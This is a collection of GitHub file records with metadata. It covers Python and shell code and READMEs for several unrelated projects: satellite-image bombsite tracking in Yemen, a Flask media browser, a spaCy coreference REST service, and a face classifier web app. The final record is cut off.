"avg_line_length": 30.875,
"blob_id": "3ba3a2265dd17c727128dfb773044efbcde8b1e3",
"content_id": "1f305bd6e2346c83dee5a1d034f3aa9dd0b1464b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1275,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 40,
"path": "/prepare.py",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "import argparse\nimport h5py\nfrom tqdm import tqdm\nimport os\nimport cv2\n\n\ndef prepare_preprocessing(args):\n h5_file = h5py.File(args.unprocessed_hdf5, 'w') # args.hdf5_file\n\n label = h5_file.create_group('label')\n target = h5_file.create_group('target')\n info = h5_file.create_group('info')\n info.create_dataset(str(1), data=\"preprocess\")\n # TODO CREATE INFO\n\n all_images = os.listdir('{}/'.format(args.unprocessed_path))\n os.chdir('{}/'.format(args.unprocessed_path))\n\n for image_file in tqdm(sorted(all_images)):\n if not \".DS_Store\" in image_file:\n img = cv2.imread(image_file)\n i = image_file.split('_')[1].split('.')[0]\n if \"src\" in image_file:\n label.create_dataset(str(i), data=img)\n if \"target\" in image_file:\n target.create_dataset(str(i), data=img)\n\n h5_file.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--unprocessed-path', type=str, default=\"data/unprocessed\")\n parser.add_argument('--unprocessed-hdf5', type=str, default=\"unprocessed.h5\")\n parser.add_argument('--preprocess', action='store_true')\n args = parser.parse_args()\n\n if args.preprocess :\n prepare_preprocessing(args)\n"
},
{
"alpha_fraction": 0.5612582564353943,
"alphanum_fraction": 0.5811258554458618,
"avg_line_length": 26.5,
"blob_id": "f44b6a661d1b6fc6b4e6bfc66884f12f9aae44f9",
"content_id": "6b5cd4765b1568ecad06700155015fb43423c751",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 604,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 22,
"path": "/datasets.py",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom torch.utils.data import Dataset\nimport h5py\nimport glob\nimport cv2\nfrom PIL import Image\n\nclass HDF5torch(Dataset):\n def __init__(self, h5_file):\n super(HDF5torch, self).__init__()\n self.h5_file = h5_file\n\n def __getitem__(self, idx):\n with h5py.File(self.h5_file, 'r') as f:\n #if f['info'][str(1)] == 'unprocessed':\n return f['label'][str(idx)][:, :], f['target'][str(idx)][:, :]\n\n def __len__(self):\n with h5py.File(self.h5_file, 'r') as f:\n return len(f['label'])\n\n# Could create a tensorflow dataset aswell"
},
{
"alpha_fraction": 0.6563400626182556,
"alphanum_fraction": 0.670028805732727,
"avg_line_length": 30.56818199157715,
"blob_id": "5ef116798968c2c8e696b37a1c7be5cc620f79d1",
"content_id": "fe80c9cf37bbdbce3d2059bd97b60e13dbb4d733",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1388,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 44,
"path": "/preprocessor.py",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "import os\nimport argparse\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport cv2\nfrom skimage import exposure\nfrom skimage.transform import match_histograms\nfrom skimage.filters import rank\nfrom skimage.morphology import disk\nfrom datasets import HDF5torch\nfrom utils import histogram_equalization, image_difference\nimport tqdm\n\ndef preprocess(dataset) :\n i = 0\n for data in dataset:\n src, target = data\n if len(src.shape) > 2:\n src = histogram_equalization(src)\n target = histogram_equalization(target)\n else:\n src = cv2.equalizeHist(src)\n target = cv2.equalizeHist(target)\n\n matched = match_histograms(src, target, multichannel=False)\n # threshold up\n t_up = 255\n # threshold down\n t_down = 205\n dif, dif_placement = image_difference(matched, target, t_up, t_down)\n\n cv2.imwrite(\"{}/{}_dif_{}_{}.jpg\".format(args.preprocessed_path, i, t_up,t_down), target * dif_placement)\n i = i+1\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--unprocessed-hdf5', type=str, default=\"unprocessed.h5\")\n parser.add_argument('--preprocessed-path', type=str, default=\"data/preprocessed\")\n args = parser.parse_args()\n\n dataset = HDF5torch(args.unprocessed_hdf5)\n preprocess(dataset)"
},
{
"alpha_fraction": 0.7508859634399414,
"alphanum_fraction": 0.7614368796348572,
"avg_line_length": 69.5397720336914,
"blob_id": "ac90458cca9666590c9f5e084741d2a287929545",
"content_id": "d02b0e1cb008ded8403f461d5addf27f0f2f8ec3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12550,
"license_type": "no_license",
"max_line_length": 350,
"num_lines": 176,
"path": "/README.md",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "# yemen-bombings-tracking\nBombsite tracing and detection project in Yemen using satellite images led by [BETTINGER Matthieu](), [HAFID Salim]() and [SADER Bruno]() for Humanity & Inclusion in collaboration with the Foundation INSA.\n\n# Sommaire\n# Architecture d'augmentation et de detection des bombardements grâce à Sentinel\n## Sentinel\nSentinel est un groupe de satelittes gratuitement accessible de Agence spatiale européenne.\nLes satelittes les plus precis sont les Sentinel-2A/B pour la qualité d'image et le Sentinel 5p pour les parametres atmospheriques (O3, CH4, NO2 etc...)\n\n### Le module **fetcher** est utilisé pour obtenir les données du satellite Sentinel-2.\n\n*--api-file* : utilisé pour initialiser la connexion avec l'API sentinelsat avec un fichier json contenant \"user\" et \"pass\". Par défaut, utilise le document appelé SentinelAPIUser.json.<br>\n*--district-file* : json contenant une liste de tous les districts (dans notre cas tous les districts du Yémen) et leur polygone correspondant.<br>\n*--district-name* : nécessaire pour récupérer les informations d'un district particulier.<br>\n*--start-date* : format ddmmYYYY<br>\n*--end-date* : format ddmmYYYY<br>\n*--level* : utilisé pour indiquer le type de produit que nous recherchons. Par défaut, le niveau est 1C (type de produit S2MSI1C) mais le niveau peut être 2A (S2MSI2A)<br>\n\nLa doc sentinelsat peut etre trouvé sur https://sentinelsat.readthedocs.io/en/stable/.\n\n### Le module **processor** est utilisé afin de traiter les images obtenues grace au fetcher.\n\nla fonction ```process_products(unprocessed_path, processed_path, best_product)``` prend en entrée trois parametres:\n1. *unprocessed_path*: qui est le chemin vers les images non traitées\n2. *processed_path*: qui est le chemin vers le dossier ou non souhaitons sauvegarder l'image traité\n3. *best_product*: est le meilleur produit (ayant une couverture nuagueuse minimale)\n\nCette fonction sert a combiner les 3 bandes de couleurs (Rouge/Vert/Bleu) en une seule image .tiff (ce format est choisi car il ne compresse pas l'image). Cependant l'image etant trop grosse, il l'a coupe en 4 images de tailles identiques (```split_into_tiles``` du module utils) afin d'avoir des images plus facilement manipulables.\n\nCe module utilise les meme arguments que fetcher\n\n### Le module utils contient toutes les fonctiones annexes utiles aux modules\n\n## Augmentation d'image\n\nL'augmentation d'image est un processus visant à ameliorer la qualité d'une image source. Les images Sentinel etant de trop \"basse\" qualité ($10m^2$), l'augmentation aurait permit au model de detection de mieux fonctionner.\n\n### Le module **prepare**\nCe module est un peu particulier car il est utilisé en amont afin de preparer nos données sous un format specifique utilisable par nos modeles.<br>\nLes images sont donc traitées selon la litterature ([\"Image Super-Resolution Using Deep Convolutional Networks\"](https://arxiv.org/abs/1501.00092) pour le SRCNN par exemple) et stockées dans un fichier hdf5 (ce fichier permettant ensuite de plus facilement utiliser les images traitées et de les partager avec une vm ou un serveur).<br>\nLes images sont traitées de la maniere suivante: \n- une image dites hr (haute resolution)\n- une image lr (low resolution) qui est l'image hr reduite d'un facteur X (parametre *--scale*) grâce à une interpolation bicubique.\n\n*--images-dir* : est le chemin vers le dossier qui contient les images qu'on souhaite preparer (le chemin du parametre processed_path).<br>\n*--output-dir* : est le chemin vers le fihcier hdf5 que nous souhaitons créer (ex. \"data_out.h5\").<br>\n*--model* : est un parametre qui permet d'indiquer pour quel model nous traitons les données.<br>\n*--eval* : est un parametre qui permet d'indiquer si nous preparons l'image à etre testée.<br>\n*--scale* : est un parametre qui permet d'indiquer quel est la diminution de resolution souhaitée.<br>\n\n### Le module **datasets**\n\nLe module dataset permet de transformer le fichier hdf5 en un object pytorch ([Dataset](https://pytorch.org/docs/stable/data.html#torch.utils.data.Dataset)) interpretable par notre model (util pour l'apprentissage et l'évaluation)\n\n### Le module **model**\n\nLe module contient les differents modeles testés lors du developement<br>\nLes 3 modeles qui sont integrés sont:\n\n- SRCNN<br>\nModel implementé selon [\"Image Super-Resolution Using Deep Convolutional Networks\"](https://arxiv.org/abs/1501.00092) et grace au [dépôt git](https://github.com/yjn870/SRCNN-pytorch/)<br>\n <center><img src=\"SRCNN_figure.png\"></center>\n\n- FSRCNN<br>\nModel implementé selon [\"Accelerating the Super-Resolution Convolutional Neural Network\"](https://arxiv.org/abs/1608.00367) et grace au [dépôt git](https://github.com/yjn870/FSRCNN-pytorch/)<br>\n<center><img src=\"FSRCNN_figure.png\"></center>\n\n- SubPixel<br>\nModel implémenté selon [\"Guided Super-Resolution as Pixel-to-Pixel Transformation\"](https://arxiv.org/abs/1904.01501) et grace au [dépôt git](https://github.com/riccardodelutio/PixTransform).<br>\nCe model permet d'appliqué l'information d'une image lr à une image hr afin d'avoir une image de bonne qualité avec les informations supplémentaires.<br>\n<center><img src=\"subpix_figure.png\" width=\"500\"></center>\n\n### Les modules **train** et **test**\n\n- Le module train<br>\nLe module sert, comme son nom l'indique, à entrainer nos modeles.<br>\n*--train-file* : est le chemin vers le fichier hdf5 d'entrainement <br>\n*--val-file* : est le chemin vers le fichier hdf5 de validation <br>\n*--output-dir* : est le chemin vers le dossier ou nous souhaitons sauvegarder les poids du model<br>\n*--scale* : est le facteur d'augmentation<br>\n*--lr* : est le learning rate<br>\n*--batch-size* : est la taille de chaque batch<br>\n*--model* : permet d'indiquer le model qu'on souhaite entrainer<br>\n*--num-epochs* : est le nombre d'epoch sur lesquels nous souhaitons entrainer<br>\n\nL'entrainement du model est fait grace à des images Google Earth (hr) qui sont reduites afin d'avoir la meme image de basse qualité. Nous entrainons donc le model à recreer l'image de base en partant de l'image lr. Afin d'evaluer le model nous utilisons comme métrique le PSNR (Peak Signal to Noise Ratio) qui est défini par la formule suivante :<br>\nPSNR = *10*$\\times$$log_{10}$$\\frac{d^2}{EQM}$ avec EQM l'erreur quadratique moyenne, et $d^2$ la dynamique du signal (la valeur maximum possible pour un pixel).\n\n- Le module test<br>\n*--weights-file* : le chemin vers le fichier des poids (.pth) <br>\n*--image-dir* : le chemin vers le dossier des images<br>\n*--scale* : est le facteur d'augmentation<br>\n*--model* : permet de choisir le model qu'on teste<br>\n*--test-data* : permet de specifier si nous voulons utiliser des images qui sont dans le répertoire courant<br>\n\n### Le module **augment**\nCe module utilise le modele entrainé et augmente les images.<br>\nIl est utilisé dans le module principal ```main```\n\n## Detection des bombardements\nLa detection des bombardements est fait grace a un modele d'apprentissage machine qui apprend a determiner sur une image ce qui est ou n'est pas un bombardement. Cette partie n'a jamais pu etre testé du au manque de puissance de calcul.<br>\nAfin d'utiliser la detection, il est necessaire d'avoir des images labelisées (cf module model).\n\n### Les modules **prepare** et **datasets**\nComme pour la partie d'augmentation, ces deux modules sont utilisés afin de preparer nos données et de les stocker dans un object utilisable par pytorch.\n- prepare<br>\n*--images-dir* : est le chemin vers le repertoire ou nous avons nos images <br>\n*--label-dir* : est le chemin vers le repertoire ou nous avons nos la labelisation de nos images <br>\n*--output-dir* : est le chemin vers le fihcier hdf5 que nous souhaitons créer (ex. \"dataset.h5\"). <br> \n*--train* : est un parametre qui permet de specifier si nous preparons les images à l'entrainement <br>\n### Le module **model**\nImplementation du model Yolov3 utilisant ce [depot git](https://github.com/eriklindernoren/PyTorch-YOLOv3).<br>\nYolo est un algortihme qui identifie dans une image des objets specifiés. Dans notre cas, ce sont des bombardements. Afin de pouvoir les retrouver, nous avons besoin d'avoir des images labelisées (dont les parties de l'image contenant les bombardements sont encadrées).<br>\nPour labeliser les images, l'outil [labelImg](https://github.com/tzutalin/labelImg) est utilisé.\n<center><img src=\"https://github.com/ydixon/yolo_v3/blob/master/doc/x_wing.gif\" width=\"600\"></center>\n\n### Les modules **train** et **detect**\nLes deux modules sont importés du depot git [PyTorch Yolov3](https://github.com/eriklindernoren/PyTorch-YOLOv3).\n\n## Main\nAfin de lancer le workflow complet, le module principal ```main``` est utilisé. Ce module combine tout les modules précedemments décrits. <br>\nA noté que le module de detection n'est toujours pas integré car n'a pas pu etre entrainé.\n\n*--api-file* : utilisé pour initialiser la connexion avec l'API sentinelsat avec un fichier json contenant \"user\" et \"pass\". Par défaut, utilise le document appelé SentinelAPIUser.json.<br>\n*--district-file* : json contenant une liste de tous les districts (dans notre cas tous les districts du Yémen) et leur polygone correspondant.<br>\n*--district-name* : nécessaire pour récupérer les informations d'un district particulier.<br>\n*--start-date* : format ddmmYYYY<br>\n*--end-date* : format ddmmYYYY<br>\n*--level* : utilisé pour indiquer le type de produit que nous recherchons. Par défaut, le niveau est 1C (type de produit S2MSI1C) mais le niveau peut être 2A (S2MSI2A)<br>\n*--unprocessed-path* : qui est le chemin vers les images non traitées<br>\n*--processed-path* : qui est le chemin vers le dossier ou non souhaitons sauvegarder l'image traité<br>\n*--augmentation-hdf5* : est le chemin vers le fichier hdf5 d'augmentation. <br>\n*--detection-hdf5* : est le chemin vers le fichier hdf5 de detection. <br>\n*--model* : parametre qui permet d'indiquer le model d'augmentation a utiliser<br>\n*--augmentation-weights* : chemin vers le fichier des poids du model d'augmentation<br>\n\nL'architecture est la suivante :\n- Le module Streaming (qui contient toutes la logique de Sentinel) se connect à l'api grâce à l'argument --api-file et la fonction ```connect_to_api```.\n- Le fetcher recupère les produits qui repondent au criteres parametrés (fonction ```fetch_products```).\n- Pre-processing en utilisant le processor et sa fonction ```process_products```.\n- Ensuite le module d'augmentation perpare les images selon les criteres parametrés.\n- Le module d'augmentation les images preparées.\n- Finalement le module de detection devrait etre integré ici afin de travailler sur les images augmentées.\n\n## Requirements\n\n- PyTorch\n- Numpy\n- h5py\n- tqdm\n- etc\n \n# Detection et comparaison d'images\nLa procédure de prétraitement pour la comparaison entre les images en vue de détecter des bombardements est la suivante:\n- Obtention d'images source et cibles d'une même zone ;\n <center><img src=\"difference/5_src.jpg\" width=\"500\"></center>\n <center><img src=\"difference/5_target.jpg\" width=\"500\"></center>\n- Génération d'un masque des bâtiments à l'aide de l'API de [PicTerra](https://picterra.ch/) afin de ne pas détecter les changements sur d'autres zones (végétation, routes, etc.) ;\n<center><img src=\"difference/5_src_msk.png\" width=\"500\"></center>\n- Harmonisation de l'histogramme de couleurs de l'image source par rapport à celle cible ;\n<center><img src=\"difference/5_harm.png\" width=\"500\"></center>\n- (Optionnel) Application d'un filtre sur les deux images pour ne pas détecter des changements extrêmement ponctuels: conservation des contours avec un filtre de Kuwahara ;\n<center><img src=\"difference/5_filtr.png\" width=\"500\"></center>\n- Obtention de la différence entre les images et seuillage par un minimum de différence donné ;\n<center><img src=\"difference/5_grad.png\" width=\"500\"></center>\n<center><img src=\"difference/5_hsv.png\" width=\"500\"></center>\n- Application du masque des bâtiments sur l'image de différence.\n<center><img src=\"difference/5_masked.png\" width=\"500\"></center>\n\n# Axes d'ameliorations et de recherches\nHomogénéisation des images : Transformations par homographie pour aligner les points de vue (ie. opencv).\nSi on a accès à beaucoup d’images : Workflows utilisés par les caméras de vidéosurveillance.\n\nProblèmes non validés : Difficile de détecter les bâtiments quand la couleur du sol est proche de celle des bâtiments.\n\n# Credit\n\n"
}
] | 6 |
mouryabs/Coherence-Resolution-Resolver | https://github.com/mouryabs/Coherence-Resolution-Resolver | a728e1ae46fbc4fbc8b9e153bf054fcd40706293 | 8986e4e33ed9ce80299b90416599d7eea16d865c | b2e666986c239fde39cbc46cfa58d3859bd19d86 | refs/heads/master | 2023-01-22T17:15:16.328789 | 2020-12-07T04:04:29 | 2020-12-07T04:04:29 | 319,197,926 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7950310707092285,
"alphanum_fraction": 0.7950310707092285,
"avg_line_length": 31.200000762939453,
"blob_id": "d8186ea4f91441a8cf2eb04c2ac758f066673f52",
"content_id": "1af42e7dc40cabf8a6034b215fc160e97caaed7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 161,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 5,
"path": "/neuralcoref.sh",
"repo_name": "mouryabs/Coherence-Resolution-Resolver",
"src_encoding": "UTF-8",
"text": "python -m spacy download en_core_web_sm\ngit clone https://github.com/huggingface/neuralcoref.git\ncd neuralcoref\npip install -r requirements.txt\npip install -e .\n"
},
{
"alpha_fraction": 0.5639412999153137,
"alphanum_fraction": 0.5639412999153137,
"avg_line_length": 17.346153259277344,
"blob_id": "233d2612f86aaf0a67c5861ee894abf577d44c07",
"content_id": "b6500db6760d3eadfe1ba46525f35cf14cfec534",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 26,
"path": "/main.py",
"repo_name": "mouryabs/Coherence-Resolution-Resolver",
"src_encoding": "UTF-8",
"text": "from flask import Flask,request,jsonify\nimport coref\n\napp = Flask(__name__)\n\n\"\"\"\n expected input:\n {\n \"text\" : \"text that you need to send\" \n }\n expected ouput:\n {\n \"text\" : \"output text\"\n }\n\"\"\"\n\[email protected]('/getCoreRef', methods=['GET', 'POST'])\ndef perform_coreref():\n my_json = request.json\n text = my_json['text']\n text = coref.coref(text)\n my_dict = dict()\n my_dict['text'] = text\n return jsonify(my_dict)\n\napp.run()\n"
},
{
"alpha_fraction": 0.7305194735527039,
"alphanum_fraction": 0.7564935088157654,
"avg_line_length": 24.66666603088379,
"blob_id": "fdb891a718405dabe6e2acea7568c3bb274ab496",
"content_id": "f20e200dd733dfb7b724c0fec933dd71469e0d03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 12,
"path": "/Dockerfile",
"repo_name": "mouryabs/Coherence-Resolution-Resolver",
"src_encoding": "UTF-8",
"text": "FROM python:3\nADD neuralcoref.sh /neuralcoref.sh\nRUN ./neuralcoref.sh\nADD main.py main.py\nADD coref.py coref.py\nRUN pip install spacy==2.3.4\nRUN python -m spacy download en_core_web_md\nRUN pip install virtualenv\nRUN pip install flask\n#EXPOSE 5000\n#RUN python main.py\nENTRYPOINT [\"/bin/bash\", \"-c\",\"main.py\"]\n"
},
{
"alpha_fraction": 0.6558139324188232,
"alphanum_fraction": 0.6558139324188232,
"avg_line_length": 21.63157844543457,
"blob_id": "e7e61299917dbffa0508982c17cfeda49ff89f2f",
"content_id": "d8014c2502bda36025b48cce9316908b7dff6823",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 19,
"path": "/coref.py",
"repo_name": "mouryabs/Coherence-Resolution-Resolver",
"src_encoding": "UTF-8",
"text": "import spacy\nimport neuralcoref\n\n## Input: text - string of the text\n## Output: modified text \ndef coref(text):\n nlp = spacy.load(\"en_core_web_md\")\n\n neuralcoref.add_to_pipe(nlp)\n doc = nlp(text)\n return doc._.coref_resolved\n\n\n\nif __name__ == \"__main__\":\n text = \"Barack Obama is the first president of US. He is from Hawaii and his wife is Michelle\"\n print(coref(text))\n\nprint(coref(\"Mourya is good. He is awesome\"))\n"
},
{
"alpha_fraction": 0.6754098534584045,
"alphanum_fraction": 0.6754098534584045,
"avg_line_length": 19.33333396911621,
"blob_id": "016cfcefaa3056744aa042e0256590223686ae63",
"content_id": "0bb960f7de6f247004172e5b503d1c850292fafd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 305,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 15,
"path": "/README.md",
"repo_name": "mouryabs/Coherence-Resolution-Resolver",
"src_encoding": "UTF-8",
"text": "# Coherence-Resolution-Resolver\nUses Neural Core Ref to perform coherence resolution, and serves it through REST API.\n\nRun the Docker File, to start the Flask Server.\n\nGET, and POST.\n\nInput Format:\\\n {\\\n \"text\" : \"text that you need to send\"\\\n }\\\nOutput Format:\\\n {\\\n \"text\" : \"output text\"\\\n }\n"
}
] | 5 |
liantian-cn/Inori | https://github.com/liantian-cn/Inori | 0afc4914615f9afcedcce8c172bed71d5d3d977f | f8c444dc0c916e1ec27f0749c42a3b5d6c5d9e2c | 2d25701c878628e67df362fb4a007805ce404dfc | refs/heads/master | 2020-04-07T01:58:40.226859 | 2018-11-19T12:51:25 | 2018-11-19T12:51:25 | 157,959,394 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6390020251274109,
"alphanum_fraction": 0.6466395258903503,
"avg_line_length": 28.75757598876953,
"blob_id": "8ea0851b785be926e7e245413d01e6c4c65a005d",
"content_id": "db893584224d22d2b36b59a91281446090e79822",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1964,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 66,
"path": "/Inori.py",
"repo_name": "liantian-cn/Inori",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# __author__ = 'Liantian'\n# __email__ = \"[email protected]\"\n\nfrom flask import Flask, send_file, redirect, render_template, url_for, request, send_from_directory\nfrom pathlib import Path\nimport random\nimport json\nimport os\n\napp = Flask(__name__)\napp.debug = True\n\nbase_dir = Path(r\"E:\\S-Cute\")\n\n\[email protected]('/')\ndef index():\n content_dir = base_dir.joinpath(\"contents\")\n content_list = list(content_dir.iterdir())\n random_slug = random.choice(content_list).relative_to(content_dir).__str__()\n # return redirect(url_for(\"content\", content_slug=random_slug), code=302)\n return content(random_slug)\n\n\[email protected](\"/contents/<string:content_slug>/\")\ndef content(content_slug):\n content_path = base_dir.joinpath(\"contents\").joinpath(content_slug)\n videos = []\n ext_name = ('mp4', \"wmv\", 'avi')\n for root, dirnames, fns in os.walk(content_path.__str__()):\n for fn in fns:\n if fn.lower().endswith(ext_name):\n videos.append(fn)\n json_file = content_path.joinpath(\"info.json\")\n with open(json_file) as f:\n data = json.load(f)\n return render_template('content.html', content=data, videos=videos)\n\n\[email protected](\"/girls/<string:girl_slug>/\")\ndef girl(girl_slug):\n girl_path = base_dir.joinpath(\"girls\").joinpath(girl_slug)\n json_file = girl_path.joinpath(\"info.json\")\n with open(json_file) as f:\n data = json.load(f)\n return render_template('girl.html', girl=data)\n\n\[email protected](\"/tag/<string:tag_title>/\")\ndef tag(tag_title):\n girl_path = base_dir.joinpath(\"tags\")\n json_file = girl_path.joinpath(\"{0}.json\".format(tag_title))\n with open(json_file) as f:\n data = json.load(f)\n return render_template('tag.html', tag=data)\n\n\[email protected]('/download/<path:filename>')\ndef download(filename):\n return send_from_directory(base_dir, filename, as_attachment=True)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n"
}
] | 1 |
twinstae/joyuris-classifier | https://github.com/twinstae/joyuris-classifier | 7bec24bb2439f2b98e86cce4bc3f384e10bb8b83 | 99ca16c8c5ee7ee2bc893d39eaed4102de373580 | 6ac13efadd9f5e578d042ba6686edb0a05516d3b | refs/heads/main | 2023-03-23T19:00:40.861436 | 2021-03-10T09:23:34 | 2021-03-10T09:23:34 | 346,246,085 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5459688901901245,
"alphanum_fraction": 0.5827440023422241,
"avg_line_length": 26.19230842590332,
"blob_id": "3284722119f2cb149ab4744fbfec8e405a2dfc2f",
"content_id": "99f6d0b29477a1dbb780e267fcfe35dd1b07ba5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 26,
"path": "/model.py",
"repo_name": "twinstae/joyuris-classifier",
"src_encoding": "UTF-8",
"text": "import os\nfrom keras.models import load_model\nimport numpy as np\ncheckpoint_dir = os.getcwd()+\"/model/\"\nmodel = load_model(checkpoint_dir+\"weight_1.hdf5\")\n\ntarget_x = 224\ntarget_y = 224\nCATEGORIES = [\"최예나\", \"조유리\", \"김채원\"]\n\n\ndef predict(img):\n img = img.convert(\"RGB\")\n img = img.resize((target_x, target_y))\n data = np.asarray(img)\n raw_x = np.array(data)\n float_x = raw_x.astype(\"float\") / 256\n x = float_x.reshape(-1, target_x, target_y, 3)\n pred = model.predict(x)[0]\n result = CATEGORIES[int(np.argmax(pred))] # 예측 값중 가장 높은 클래스 반환\n\n return result, {\n \"최예나\": int(100 * pred[0]),\n \"조유리\": int(100 * pred[1]),\n \"김채원\": int(100 * pred[2])\n }\n"
},
{
"alpha_fraction": 0.45255473256111145,
"alphanum_fraction": 0.6788321137428284,
"avg_line_length": 14.333333015441895,
"blob_id": "334ab345db441937adb0c99f3af06cc0eb771546",
"content_id": "9c16c399f5066c5913f1abd5289abac06976e077",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 137,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 9,
"path": "/requirements.txt",
"repo_name": "twinstae/joyuris-classifier",
"src_encoding": "UTF-8",
"text": "bokeh==2.2.3\nnumpy==1.19.5\nstarlette==0.13.6\ntensorflow==2.4.1\nKeras==2.4.3\npandas==1.2.2\nstreamlit==0.77.0\nfastapi==0.63.0\nPillow==8.1.2"
},
{
"alpha_fraction": 0.6253687143325806,
"alphanum_fraction": 0.6253687143325806,
"avg_line_length": 24.11111068725586,
"blob_id": "80ff55c1b88adf2a8e15a7d163cd2cf074deccd2",
"content_id": "4eebd2f73b6a402650b23f80e487c0aaa9d90769",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 678,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 27,
"path": "/main.py",
"repo_name": "twinstae/joyuris-classifier",
"src_encoding": "UTF-8",
"text": "from fastapi import FastAPI, UploadFile, File\nfrom starlette.responses import HTMLResponse\nfrom model import predict\nimport os\napp = FastAPI()\n\n\[email protected](\"/\")\ndef main():\n content = \"\"\"\n <body>\n <form action=\"/upload\" enctype=\"multipart/form-data\" method=\"post\">\n <input name=\"image\" type=\"file\">\n <input type=\"submit\">\n </form>\n </body>\n \"\"\"\n return HTMLResponse(content=content)\n\n\[email protected](\"/upload\")\ndef upload_file(image: UploadFile = File(...)):\n file_name = os.getcwd() + \"/img/test/\" + image.filename.replace(\" \", \"-\")\n with open(file_name, 'wb+') as f:\n f.write(image.file.read())\n f.close()\n return predict(file_name)\n"
},
{
"alpha_fraction": 0.6337920427322388,
"alphanum_fraction": 0.6475535035133362,
"avg_line_length": 30.14285659790039,
"blob_id": "feca8d08078a4d5cf994432c7475a83943dd5d9f",
"content_id": "45da924c5e6aab565a82dc021b8c1c00484fd183",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1378,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 42,
"path": "/streamlit_app.py",
"repo_name": "twinstae/joyuris-classifier",
"src_encoding": "UTF-8",
"text": "import streamlit as st\nimport pandas as pd\nfrom math import pi\n\nfrom PIL import Image\nfrom bokeh.plotting import figure\nfrom bokeh.transform import cumsum\nfrom model import predict\n\n\ndef create_pie_chart(probability_dict):\n data = pd.Series(probability_dict).reset_index(name='value').rename(columns={'index': 'candidate'})\n data['angle'] = data['value'] / data['value'].sum() * 2 * pi\n data['color'] = ['#ccebc5', '#fed9a6', '#ffffcc']\n\n print(data)\n\n p = figure(plot_height=350, title=\"신경망이 예측한 확률 비율\", toolbar_location=None,\n tools=\"hover\", tooltips=\"@candidate: @value\", x_range=(-0.5, 1.0))\n\n p.wedge(x=0, y=1, radius=0.4,\n start_angle=cumsum('angle', include_zero=True), end_angle=cumsum('angle'),\n line_color=\"white\", fill_color='color', legend_field='candidate', source=data)\n\n p.axis.axis_label = None\n p.axis.visible = False\n p.grid.grid_line_color = None\n st.bokeh_chart(p, use_container_width=False)\n\n\nst.title(\"조유리즈 판별기\")\nuploaded_file = st.file_uploader(\"얼굴만 자른 사진을 올려주세요...\", type=\"jpg\")\nif uploaded_file is not None:\n img = Image.open(uploaded_file)\n prediction, probability = predict(img)\n st.image(\n img,\n width=256,\n caption=f\"이 사람은... {prediction}!\",\n )\n\n create_pie_chart(probability)\n"
}
] | 4 |
porrametict/django_and_vuejs | https://github.com/porrametict/django_and_vuejs | 8c69239590b26ad4068155237e7f7c4d56686383 | dba111fe4539c2b8cfb7b34a9eb09d636f13df2d | 9664e90de314d134ea613173f670b1be0cd6a632 | refs/heads/master | 2021-02-03T22:05:47.814962 | 2020-02-27T16:01:12 | 2020-02-27T16:01:12 | 243,554,000 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 20,
"blob_id": "4a01993ef61ee676326bc82ec371aa52bf33aa0c",
"content_id": "c591bc3fe11196789e2e65a6d4d24dee2bb7e184",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "\"# django_and_vuejs\" \n"
},
{
"alpha_fraction": 0.719584584236145,
"alphanum_fraction": 0.7225519418716431,
"avg_line_length": 32.70000076293945,
